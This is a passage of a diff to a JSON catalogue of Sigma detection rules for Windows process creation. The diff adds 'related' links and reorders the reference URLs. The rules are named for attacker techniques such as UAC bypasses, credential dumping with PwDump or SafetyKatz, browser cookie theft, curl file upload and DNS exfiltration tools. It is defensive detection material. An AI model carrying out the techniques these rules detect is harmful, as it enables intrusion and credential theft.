"767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9a132afa-654e-11eb-ae93-0242ac130002", "value": "AdFind Usage Detection" }, @@ -39341,11 +50397,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1", + "https://blog.alyac.co.kr/1901", + "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/", "https://en.wikipedia.org/wiki/Hangul_(word_processor)", "https://twitter.com/cyberwar_15/status/1187287262054076416", - "https://blog.alyac.co.kr/1901", - "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1", - "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml" ], "tags": [ @@ -39357,6 +50413,22 @@ "attack.g0032" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "023394c4-29d5-46ab-92b8-6a534c6f447b", "value": "Suspicious HWP Sub Processes" }, @@ -39381,6 +50453,15 @@ "attack.t1548" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", "value": "UAC Bypass via Windows Firewall Snap-In Hijack" }, @@ -39405,6 +50486,15 @@ "attack.t1555.003" ] }, + "related": [ + { + "dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", "value": "Launch WebBrowserPassView Executable" }, @@ -39445,8 +50535,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east", "https://github.com/quarkslab/quarkspwdump", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml" ], "tags": [ @@ -39454,6 +50544,15 @@ "attack.t1003.002" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0685b176-c816-4837-8e7b-1216f346636b", "value": "Quarks PwDump Usage" }, @@ -39478,6 +50577,15 @@ "attack.t1572" ] }, + "related": [ + { + "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", "value": "Suspicious SSH Usage RDP Tunneling" }, @@ -39494,9 +50602,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/", "https://twitter.com/nas_bench/status/1534957360032120833", - "https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml" ], "tags": [ @@ -39507,6 +50615,29 @@ "attack.t1127" ] }, + "related": [ + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", "value": "WinDbg/CDB LOLBIN Usage" }, @@ -39523,8 +50654,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_creation.yml" ], "tags": [ @@ -39534,6 +50665,29 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", "value": "Shadow Copies Creation Using Operating Systems Utilities" }, @@ -39558,6 +50712,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b1876533-4ed5-4a83-90f3-b8645840a413", "value": "SafetyKatz Hack Tool" }, @@ -39583,6 +50746,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "09af397b-c5eb-4811-b2bb-08b3de464ebf", "value": "WMI Reconnaissance List Remote Services" }, @@ -39609,6 +50781,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", "value": "Fireball Archer Install" }, @@ -39636,6 +50817,22 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", "value": "Microsoft Workflow Compiler" }, @@ -39652,8 +50849,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Print/", "https://twitter.com/Oddvarmoe/status/985518877076541440", + "https://lolbas-project.github.io/lolbas/Binaries/Print/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_print.yml" ], "tags": [ @@ -39661,6 +50858,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", "value": "Abusing Print Executable" }, @@ -39677,8 +50883,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md", "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains", + "https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_w32tm.yml" ], "tags": [ @@ -39713,6 +50919,15 @@ "attack.t1059.003" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", "value": "Elise Backdoor" }, @@ -39738,6 +50953,15 @@ "attack.t1106" ] }, + "related": [ + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4a12fa47-c735-4032-a214-6fab5b120670", "value": "Lazarus Activity Apr21" }, @@ -39786,6 +51010,15 @@ "attack.t1555.003" ] }, + "related": [ + { + "dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", "value": "Potential Browser Data Stealing" }, @@ -39802,7 +51035,6 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://attack.mitre.org/techniques/T1564/006/", "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", "https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_virtualbox.yml" @@ -39813,6 +51045,22 @@ "attack.t1564" ] }, + "related": [ + { + "dest-uuid": "b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bab049ca-7471-4828-9024-38279a4c04da", "value": "Detect Virtualbox Driver Installation OR Starting Of VMs" }, @@ -39837,6 +51085,15 @@ "attack.t1588.002" ] }, + "related": [ + { + "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd764533-2e07-40d6-a718-cfeec7f2da7f", "value": "Renamed SysInternals Debug View" }, @@ -39854,8 +51111,8 @@ "logsource.product": "windows", "refs": [ "https://www.echotrail.io/insights/search/mshta.exe", - "https://en.wikipedia.org/wiki/HTML_Application", "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://en.wikipedia.org/wiki/HTML_Application", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml" ], "tags": [ @@ -39863,6 +51120,15 @@ "attack.t1106" ] }, + "related": [ + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", "value": "Suspicious MSHTA Process Patterns" }, @@ -39888,32 +51154,6 @@ "uuid": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", "value": "Potential COM Objects Download Cradles Usage - Process Creation" }, - { - "description": "Detects suspicious encoded character syntax often used for defense evasion", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/07/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_powershell_encoded_param.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/0gtweet/status/1281103918693482496", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encoded_param.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "e312efd0-35a1-407f-8439-b8d434b438a6", - "value": "PowerShell Encoded Character Syntax" - }, { "description": "Detects the use of 3proxy, a tiny free proxy server", "meta": { @@ -39927,8 +51167,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/3proxy/3proxy", "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/3proxy/3proxy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml" ], "tags": [ @@ -39936,6 +51176,15 @@ "attack.t1572" ] }, + "related": [ + { + "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f38a82d2-fba3-4781-b549-525efbec8506", "value": "3Proxy Usage" }, @@ -39952,10 +51201,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/d1r4c/status/1279042657508081664", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", "https://curl.se/docs/manpage.html", "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", - "https://twitter.com/d1r4c/status/1279042657508081664", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml" ], "tags": [ @@ -39964,6 +51213,22 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "00bca14a-df4e-4649-9054-3f2aa676bc04", "value": "Suspicious Curl File Upload" }, @@ -39989,6 +51254,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "80fc36aa-945e-4181-89f2-2f907ab6775d", "value": "UAC Bypass Using IEInstal - Process" }, @@ -40016,6 +51290,22 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", "value": "Suspicious ZipExec Execution" }, @@ -40042,6 +51332,29 @@ "attack.t1132.001" ] }, + "related": [ + { + "dest-uuid": "79a4052e-1a89-4b09-aea6-51f1d11fe19c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "04fd5427-79c7-44ea-ae13-11b24778ff1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "98a96a5a-64a0-4c42-92c5-489da3866cb0", "value": "DNS Exfiltration and Tunneling Tools Execution" }, @@ -40066,6 +51379,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", "value": "Use of GoToAssist Remote Access Software" }, @@ -40090,6 +51412,15 @@ "attack.t1552.006" ] }, + "related": [ + { + "dest-uuid": "8d7bd4f5-3a89-4453-9c82-2c8894d5655e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "91a2c315-9ee6-4052-a853-6f6a8238f90d", "value": "Findstr GPP Passwords" }, @@ -40129,9 +51460,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", "https://guides.lib.umich.edu/c.php?g=282942&p=1885348", + "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_image.yml" ], "tags": [ @@ -40139,6 +51470,15 @@ "attack.t1218.010" ] }, + "related": [ + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", "value": "Suspicious Regsvr32 Execution With Image Extension" }, @@ -40164,6 +51504,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", "value": "Remote Code Execute via Winrm.vbs" }, @@ -40182,8 +51531,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md", - "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn", + "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml" ], "tags": [ @@ -40207,10 +51556,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1211636381086339073", - "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html", - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html", + "https://twitter.com/SBousseaden/status/1211636381086339073", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml" ], "tags": [ @@ -40222,6 +51571,15 @@ "attack.t1021.002" ] }, + "related": [ + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", "value": "Copy from Admin Share" }, @@ -40247,6 +51605,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", "value": "UAC Bypass via ICMLuaUtil" }, @@ -40271,6 +51638,15 @@ "attack.t1562.002" ] }, + "related": [ + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", "value": "SharpEvtMute EvtMuteHook Load" }, @@ -40298,6 +51674,22 @@ "attack.t1134.003" ] }, + "related": [ + { + "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "8cdeb020-e31e-4f88-a582-f53dcfbda819", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cf0c254b-22f1-4b2b-8221-e137b3c0af94", "value": "Impersonate Execution" }, @@ -40314,8 +51706,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_set_service_to_hide_services.yml" ], "tags": [ @@ -40412,9 +51804,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://twitter.com/jonasLyk/status/1555914501802921984", + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml" ], "tags": [ @@ -40422,6 +51814,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "value": "Use NTFS Short Name in Image" }, @@ -40447,6 +51848,15 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20", "value": "Renamed PowerShell" }, @@ -40471,6 +51881,15 @@ "attack.t1539" ] }, + "related": [ + { + "dest-uuid": "10ffac09-e42d-4f56-ab20-db94c67d76ff", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4833155a-4053-4c9c-a997-777fcea0baa7", "value": "SQLite Firefox Cookie DB Access" }, @@ -40488,8 +51907,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/hexacorn/status/1448037865435320323", "https://twitter.com/Gal_B1t/status/1062971006078345217", + "https://twitter.com/hexacorn/status/1448037865435320323", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml" ], "tags": [ @@ -40571,6 +51990,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ce7cf472-6fcc-490a-9481-3786840b5d9b", "value": "InfDefaultInstall.exe .inf Execution" }, @@ -40588,8 +52016,8 @@ "logsource.product": "windows", "refs": [ "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", - "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", + "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_modules.yml" ], "tags": [ @@ -40597,6 +52025,15 @@ "attack.t1059.003" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4f154fb6-27d1-4813-a759-78b93e0b9c48", "value": "Operator Bloopers Cobalt Strike Modules" }, @@ -40613,8 +52050,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/bohops/status/948061991012327424", "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://twitter.com/bohops/status/948061991012327424", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml" ], "tags": [ @@ -40622,6 +52059,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a0459f02-ac51-4c09-b511-b8c9203fc429", "value": "Execution via CL_Invocation.ps1" }, @@ -40741,6 +52187,15 @@ "attack.t1135" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "75925535-ca97-4e0a-a850-00b5c00779dc", "value": "Automated Turla Group Lateral Movement" }, @@ -40765,6 +52220,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", "value": "Execute From Alternate Data Streams" }, @@ -40811,6 +52275,15 @@ "attack.t1484.001" ] }, + "related": [ + { + "dest-uuid": "5d2be8b9-d24c-4e98-83bf-2f5f79477163", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ada4b0c4-758b-46ac-9033-9004613a150d", "value": "Modify Group Policy Settings" }, @@ -40837,6 +52310,15 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "258fc8ce-8352-443a-9120-8a11e4857fa5", "value": "Execute Arbitrary Commands Using MSDT.EXE" }, @@ -40861,6 +52343,15 @@ "attack.t1552.002" ] }, + "related": [ + { + "dest-uuid": "341e222a-a6e3-4f6f-b69c-831d792b1580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", "value": "Enumeration for Credentials in Registry" }, @@ -40885,6 +52376,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", "value": "Custom Class Execution via Xwizard" }, @@ -40901,10 +52401,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", "https://twitter.com/BleepinComputer/status/1372218235949617161", "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", "https://twitter.com/GadixCRK/status/1369313704869834753?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml" ], @@ -40914,6 +52414,15 @@ "attack.t1053" ] }, + "related": [ + { + "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", "value": "Exchange Exploitation Activity" }, @@ -40931,8 +52440,8 @@ 